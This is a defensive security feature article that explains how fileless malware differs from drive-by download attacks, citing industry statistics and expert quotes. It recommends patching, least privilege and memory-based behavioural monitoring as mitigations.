When WatchGuard Threat Labs published its 2019 security predictions as 2018 was coming to an end, one entry leapt from the page: the emergence of vaporworms. It turns out that what was being described was a self-propagating form of fileless malware. While malware running entirely in memory, without installing a file onto the impacted system, is not a new threat, it most certainly is a growing one.
Indeed, whereas it was once assumed that the savvy business could avoid becoming the victim of a computer virus just by the avoidance of downloading dodgy files from untrusted sources, that hasn’t been the case more recently. The modern threat landscape is littered with fileless malware and drive-by download attacks that can do their damage with little or no action needed on the part of the user. So, what are the differences between these two attack methodologies, and what can the enterprise do to mitigate against them?
What’s the Difference?
Let’s start with how drive-by downloads and fileless malware differ, which should be obvious by virtue of the threat names themselves. A drive-by download requires the delivery, installation and execution of malware onto the victim’s system, whereas fileless malware only exists in the memory of the system rather than needing that initial physical presence. Both attack methodologies tend to rely on stealth in order to succeed, however, as Steven Furnell, senior IEEE member and Professor of information security at the University of Plymouth points out, the differences are a little more conceptual than that and a certain amount of crossover exists between the two threats.
“Fileless malware is a mode of operation, by contrast, a drive-by download is a mode of infection,” he explains, adding “the dropping of fileless malware onto a system could occur as an outcome of a drive-by download, of course.”
When the Ponemon Institute looked back at the 2017 endpoint security risk landscape it found that 54% of companies experienced at least one successful attack on their data or infrastructure and, tellingly, in 77% of those attacks, fileless malware was exploited. Indeed, the same report suggests that fileless attacks are more likely (by a factor of 10) to succeed than file-based attacks.
Remember that Russian bank heist back in July 2018? The MoneyTaker hacking group used custom fileless malware to help pull that, and a bunch of other attacks, off. It is thought they were able to net more than $14m in total. It comes as no surprise, then, that the rise of fileless malware has continued. According to the SentinelOne H1 2018 Enterprise Risk Index Report, the use of fileless malware attacks rose by 94% in the first six months of the year. PowerShell attacks alone grew from 2.5 per 1000 endpoints in May to 5.2 by June 2018. All fileless malware attacks equated to 42 out of every 1000 endpoint attacks halfway through the year.
As far as drive-by downloads are concerned, the overall picture looks just as gloomy. The 2017 Cylance Threat Report concluded that more than half of the attacks during 2017 exploited vulnerabilities that had been known about at least nine months or more prior to the exploit. What’s more, along with ever-present phishing threats, drive-by downloads remained the most common of infection vectors. In 2018, Infosecurity reported how a traffic distribution system called BlackTDS had emerged as an ‘As-a-Service’ drive-by download kit. So, these old threat vectors are not only still around, but appear to be on the rise. Why is that?
“Fileless malware is a mode of operation, by contrast, a drive-by download is a mode of infection”
Drive-By Drops?
First of all, it would not be a surprise if the number of drive-by attacks either levels out or starts falling once organizations respond to the 2018 full year threat landscape reports. That is because, as the browser security improvement curve slowly rises, the effectiveness of drive-by exploit kits will start tapering off. So, while in the summer of 2018, a report from Bromium suggested that ‘download attacks’ in general were being used slightly more than attachment-based malware, it could likely prove to be a blip. There will inevitably always be opportunities for modifying site code through cross-site scripting (XSS), iFrames or JavaScript, for example, but increased developer security awareness means these opportunities are fewer year on year.
Certainly, as far as the broader drive-by exploit vector is concerned, if target sites cannot be modified easily enough through browser exploits to make the effort involved a profitable one, the bad guys will surely look for easier avenues of criminality. That suggests there will be even more success for the fileless malware option, especially when used as part of an overall attack campaign.
“It’s increasingly being used during the early stages of an intrusion,” says Michael Yip, security principal at iDefense. “That’s because threat actors are careful about selecting their victims before planting more sophisticated malware.” Why is this? It provides them with the luxury of time to collect as much data about the victim as possible without the fear of detection.
That’s the real kicker when it comes to why fileless malware in particular is not only on the up, but will continue to rise for the foreseeable future: by exploiting the kind of scripts (such as Windows PowerShell) that already exist on a network, without resorting to file-level modifications. It can sail right past many of the anti-malware protections in place in the enterprise pretty much in plain sight.
Fileless malware is, in effect, a zero-footprint threat. If you cannot see it, you cannot easily defend against it. The enterprise simply cannot just block the files that are exploited by fileless malware. Imagine the impact on IT support and systems if PowerShell were blacklisted, not that it would do much good anyway. After all, threat actors are perfectly capable of Googling how to bypass your PowerShell execution policy. So, what should the enterprise be doing to mitigate the undeniable cyber-risk that both fileless and, to a lesser extent, drive-by attack methodologies pose?
“Browsers, plugins and all web technology should be up-to-date with security patches”
Mitigating the Risk
Let’s look at the easier to mitigate against risk first, namely drive-by downloads. As this kind of attack methodology relies entirely on there being vulnerable software, from plugin to application, the best starting point is a somewhat obvious one. Cesar Cerrudo, CTO at security researchers IOActive, advises using multiple layers of protection. “Browsers, plugins and all web technology should be up-to-date with security patches,” Cerrudo says, adding “the same for all the software and operating systems.”
Patch management should be at the top of the enterprise security list anyway, but if this was a reality, then these kinds of attacks would have long since petered out. Ensuring user accounts are not over-privileged can help reduce the impact of any sideways movement via privilege escalation that the malware may try to invoke once executed. Behavioral monitoring solutions will offer some protection once the downloaded file executes on the endpoint system, looking for such things as arbitrary code injection into other processes.
As for fileless malware attack mitigation, things are rather less straightforward. Assuming that the disabling of those routes through which the malware may travel when it comes to command issuing (PowerShell, Windows Management Instrumentation, Word macros etc.) has been explored and rejected courtesy of the disruption to workflow it would cause, then behavioral user attributes are a good starting point. “Detection of the malware relies upon monitoring the system and spotting the things it is trying to do,” Professor Furnell advises. “This in turn relies upon real-time protection solutions.” Unfortunately, the real-time bit is usually the main problem: fileless malware only needs seconds to execute and propagate through a network, and as it leaves no evidence trail to follow, it can cause immense damage before it can be spotted and stopped.
“As the malware only exists in memory, scanning that memory is the only way to detect its presence,” Yip explains. That is problematic, as most fileless exploits will obfuscate their presence using string encoding, for example. However, Yip is correct in as far as you have to spot fileless malware in the act, doing its stuff in memory, in order to catch it. This means a change in thinking and an acknowledgement from the enterprise security team that the indicators of compromise will be different to file-based attacks.
The same patching of endpoints advice offered earlier stands. In addition, the use of advanced monitoring solutions that employ some degree of machine learning to be able to spot suspicious behavior in memory and that can isolate the threat efficiently (and without human intervention) should also be considered.
At the risk of sounding like an Arnold Schwarzenegger movie trailer, seek and destroy AI bots are likely going to be the way forward as fileless malware continues to take a grip on the threat landscape.